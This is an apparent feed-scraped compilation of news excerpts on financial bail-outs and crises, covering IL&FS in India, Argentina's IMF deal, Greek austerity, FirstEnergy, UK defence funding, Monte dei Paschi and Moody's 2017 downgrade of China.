As recently as early September, IL&FS raised few concerns. A couple of weeks later it had defaulted on several payments to creditors. By the end of the month it had said it would raise 45bn rupees ($ 630m) of fresh capital through a rights issue from its owners, including the Life Insurance Corporation of India, a state-owned insurer. On October 1st the government forced out the board and appointed a new one. It was, in effect, a shadow-bank bail-out.
IL&FS is a very Indian beast. It was founded in 1987, with the support of state-owned banks, to provide finance to local governments for infrastructure. It has grown into a vast conglomerate, with 169 group companies. It finances, builds and runs everything from toll roads to “smart cities”, not just in India but abroad. Though it is private, the projects it runs, and the roughly 40% of its equity that is owned by nationalised firms, make it what Indian analysts call “quasi-sovereign”. If it went bust, projects…
]]>THE three-year, $ 50bn credit line agreed on with the IMF on June 7th was intended to halt Argentina’s currency crisis. The peso had lost a quarter of its value against the dollar since the start of the year as investors fled to safe havens. It kept sliding. On August 29th Mauricio Macri, Argentina’s president, asked the IMF to bulk up the package. On September 26th, after three weeks of negotiations, the fund’s managing director, Christine Lagarde, agreed to increase Argentina’s credit line from $ 50bn to $ 57.1bn and accelerate its disbursal.
Argentina is on the brink of its second recession since Mr Macri took office in 2015. The peso has now fallen by more than half in 2018, pushing inflation to 34% in August. The central bank has raised interest rates to 60%. Investors worry that a further slide in the peso would leave Argentina unable to service its large pile of foreign-currency debt. Mr Macri’s approval ratings have slumped.

RT’s Keiser Report looks into media reports hailing the end of austerity in Greece, contradicted by the harsh reality of decades of painful austerity still ahead.
Greece’s former finance minister Yanis Varoufakis posted a sobering tweet, pointing out that his country had “entered 32 years of permanent harsh austerity while the world media celebrated the end of Greek austerity.”
Max Keiser explains that the “vultures left the table because there’s nothing left to eat. The IMF and the Troika, the ECB and EU, they all fed on the corpse of Greece that they themselves killed, until there was nothing left to pick. There’s no more meat on the bone. They took all the assets, they sold them, they repackaged them, they financialized them, and now they’re leaving… And now they’re moving on to another country and [will] probably destroy that country.”

“NO ONE buys furniture in a crisis,” laments Konstantinos Vourvoulakis. He and his father used to sell handmade furniture, but as customers became strapped for cash, they shut up shop in 2014. A chatty man with a sunny disposition, he started driving a taxi instead, ferrying tourists around Athens and offering travel tips. But he doubts he will be able to afford a holiday himself any time soon.
Greece’s public-debt woes triggered an economic collapse that lasted longer than the Great Depression in America. In 2009 the new prime minister admitted that budget-deficit figures had been understated for years, and were perhaps double those originally reported. Ratings agencies downgraded its debt. Interest rates surged. In 2010 the government turned to the euro zone and the IMF for help. Their loans had strings attached: that Greece implement deep spending cuts and structural reforms.
On August 20th Greece exits the last of three bail-out packages. Both its creditors and its government…

On Saturday, power corporation FirstEnergy placed its coal and nuclear generation units under chapter 11 bankruptcy. Although coal and nuclear plants across the country have struggled to compete with the low prices of natural gas, FirstEnergy’s filing is unique because it stands to take on a political dimension. Just two days before FirstEnergy’s bankruptcy filing, the company petitioned the Department of Energy (DOE) for an emergency bailout, citing concerns about reliability.
The petition could reinvigorate a debate started by Energy Secretary Rick Perry, who proposed a rule last year to change how coal and nuclear plants are compensated for their power. The rule was denied by the Federal Energy Regulatory Commission (FERC), which said that there was not enough evidence to justify changing how coal and nuclear are compensated.
FirstEnergy disparaged FERC’s decision in its Thursday petition (PDF), claiming that “as a result of FERC’s and the RTO’s [Regional Transmission Organization’s] failure to address this crisis, swift and decisive action is needed now to address this imminent loss of nuclear and coal-fired baseload generation and the threat to the electric grid that this loss poses” (emphasis FirstEnergy’s).
]]>A full review of current army, navy and Royal Air Force (RAF) strength must be undertaken so troop numbers are not slashed further and vital equipment is not lost, military sources have insisted. The MoD is proposing a full defense review, three years earlier than expected, and is pleading for £4 billion ($ 5.3 billion) in emergency cash.
National Security Adviser Mark Sedwill will be formally asked if the defense element of a review of security capability can be elevated to a formal strategic defense review early next year, unnamed sources told the Times.
A national security capability review is currently taking place, and includes areas such as foreign aid and counterterrorism, but the MoD will seize upon it and request that a full defense review be born from the current, “light touch” examination.
Prime Minister Theresa May will be asked to give the green light for a £4 billion bailout from the Treasury – despite the Treasury allegedly owing the MoD already for using military helicopters and jets without paying.
MoD chiefs will argue they can save half of the £4 billion by closing some back office operations and making support costs cheaper, or maintenance savings. However, the predicted black hole in the defense budget is currently around £30 billion over 10 years.
The man at the helm of the operation – recently appointed Defence Secretary Gavin Williamson – is said to have a business brain, but no military experience. A defense source told the Times the military will do its best to convince the former chief whip that cuts must be avoided.
“The proposal needs selling to Downing Street, as a full defense review would need to be commissioned there to have any meaning,” a source said.
“But interest levels there are low and ‘distractions’ not welcomed. Gavin now needs to earn his spurs.”
The defense secretary and Chancellor Philip Hammond, however, are on bad terms. Theresa May allegedly had to intervene in a “blazing row” between the pair. Child-like comparisons to ‘Dad’s Army’ characters have been slung between Hammond allies and Williamson supporters – with Williamson being compared to the dopy Private Pike character from the popular comedy program and Hammond likened to Private Frazer, the doom-mongering undertaker.
If Hammond refuses the proposal, Williamson could be very unpopular. Massive savings will have to be made and new orders for up-and-coming war tech canceled. Amphibious assault ships HMS ‘Bulwark’ and HMS ‘Albion’ as well as helicopters are for the chop, it is claimed, while there are rumors of 1,000 marines being cut.
This could spark infighting between the UK’s three pillars of defense, as they battle to keep their personnel and machines. A final draft of the national security capability review is due to be considered by Prime Minister May and the National Security Committee on December 19.

HELP is at hand for the world’s oldest bank. On June 1st the European Commission said it had agreed in principle to a bail-out by the Italian government of Monte dei Paschi di Siena, founded in 1472. For years Monte dei Paschi, Italy’s fourth-biggest bank by assets, has lurched from crisis to crisis. Last July it flunked a test by European supervisors of its capital strength. In December a private-sector restructuring scheme came to naught and the state decided to step in.
The details, including the size of the bail-out, have yet to be hammered out. In December the European Central Bank (ECB) estimated that Monte dei Paschi would need €8.8bn ($ 9.2bn) in capital to withstand the “adverse scenario” in last summer’s test. The Bank of Italy reckoned that the state’s share would be €6.6bn.
That included €2bn to compensate retail investors in the bank’s junior bonds, many of them ordinary customers. European state-…

SHANGHAI/BEIJING (Reuters) – Moody’s Investors Service downgraded China’s credit ratings on Wednesday for the first time in nearly 30 years, saying it expects the financial strength of the economy will erode in coming years as growth slows and debt continues to rise.
The one-notch downgrade in long-term local and foreign currency issuer ratings, to A1 from Aa3, comes as the Chinese government grapples with the challenges of rising financial risks stemming from years of credit-fueled stimulus.
“The downgrade reflects Moody’s expectation that China’s financial strength will erode somewhat over the coming years, with economy-wide debt continuing to rise as potential growth slows,” the ratings agency said in a statement, changing its outlook for China to stable from negative.
China’s Finance Ministry said the downgrade, Moody’s first for the country since 1989, overestimated the risks to the economy and was based on “inappropriate methodology”.
“Moody’s views that China’s non-financial debt will rise rapidly and the government would continue to maintain growth via stimulus measures are exaggerating difficulties facing the Chinese economy, and underestimating the Chinese government’s ability to deepen supply-side structural reform and appropriately expand aggregate demand,” the ministry said in a statement.
China’s leaders have identified the containment of financial risks and asset bubbles as a top priority this year. All the same, authorities are moving cautiously to avoid knocking economic growth, gingerly raising short-term interest rates while tightening regulatory supervision.
At the same time, Beijing’s need to deliver on official growth targets is likely to make the economy increasingly reliant on stimulus, Moody’s said.
“While ongoing progress on reforms is likely to transform the economy and financial system over time, it is not likely to prevent a further material rise in economy-wide debt, and the consequent increase in contingent liabilities for the government,” it said.
While the downgrade is likely to modestly increase the cost of borrowing for the Chinese government and its state-owned enterprises (SOEs), it remains comfortably within the investment grade rating range.
World stocks inched lower after the move, though Shanghai’s main index recouped early losses to end marginally higher.
“After being very much at the front and center of global risk sentiment at the beginning of last year, the Chinese slowdown story has been almost forgotten, with politics throughout Europe and the U.S. taking the limelight,” said David Cheetham, chief market analyst at brokerage XTB.
The yuan currency briefly dipped against the U.S. dollar in offshore trading, as did the Australian dollar, often seen as a proxy for China risk.
“It’s going to be quite negative in terms of sentiment, particularly at a time when China is looking to de-risk the banking system (and) when there’s going to be some potential restructuring of SOEs,” said Vishnu Varathan, Asia head of economics and strategy at Mizuho Bank’s Treasury division.

In March 2016, Moody’s cut its outlook on China’s ratings to negative from stable, citing rising debt and uncertainty about authorities’ ability to carry out reforms.
Rival ratings agency Standard & Poor’s downgraded its outlook to negative in the same month. S&P’s AA- rating is one notch above both Moody’s and Fitch Ratings, leading to speculation among analysts that S&P could also downgrade soon.
“We understand the risk and the reason for downgrade, but due to China being a unique system – (with a) closed capital account and strong government control over all important sectors – it can tolerate a higher debt level,” said Edmund Goh, a Kuala Lumpur-based investment manager at Aberdeen Asset Management.
The slowing economy has become an increasingly sensitive topic in China, with authorities directing mainland Chinese economists and journalists toward more positive messaging.
Authorities have stepped up efforts over the last several months to curb debt and housing risks, and a raft of recent data has signaled a cooling in the economy, which grew a solid 6.9 percent in the first quarter.
China’s potential economic growth was likely to slow toward 5 percent in coming years, but the cooldown is likely to be gradual due to further doses of fiscal stimulus, Moody’s said.
The Finance Ministry said continued mid- to high-level economic growth “will provide fundamental support to fend off local government debt risks. China’s government debt risks will not change dramatically in 2018-2020 from 2016.”
The state planner, the National Development and Reform Commission (NDRC), said debt risks are generally controllable as measures to lower corporate leverage have achieved initial results, and systemic risks from debt are relatively low.
Government-led stimulus has been a major driver of China’s growth over recent years, but has also been accompanied by runaway credit growth that has created a mountain of debt – now standing at nearly 300 percent of gross domestic product (GDP).
Julian Evans-Pritchard, China economist at Capital Economics in Singapore, said steps to resolve the debt overhang, such as debt-for-equity swaps at state companies, were insufficient to deal with problem.
“It’s reached the point where the bad debt problem is just so large the government will have to step in to resolve it at some point, and that obviously means at some point a sizeable increase in government debt,” he said.
Moody’s said it expects the government’s direct debt burden to rise gradually toward 40 percent of GDP by 2018 “and closer to 45 percent by the end of the decade”.
A growing number of economists believe that a massive bank bailout may be inevitable in China as bad loans mount. Last September, the Bank for International Settlements (BIS) warned that excessive credit growth in China signaled an increasing risk of a banking crisis within three years.
Moody’s lowered Agricultural Bank of China’s long-term deposit and senior unsecured debt ratings to A2 from A1, on par with Bank of Communications’, which the agency put on review for possible downgrade.
Ratings for state-owned Bank of China, China Construction Bank and Industrial and Commercial Bank of China were affirmed at A1, with Moody’s citing their very high level of government support.
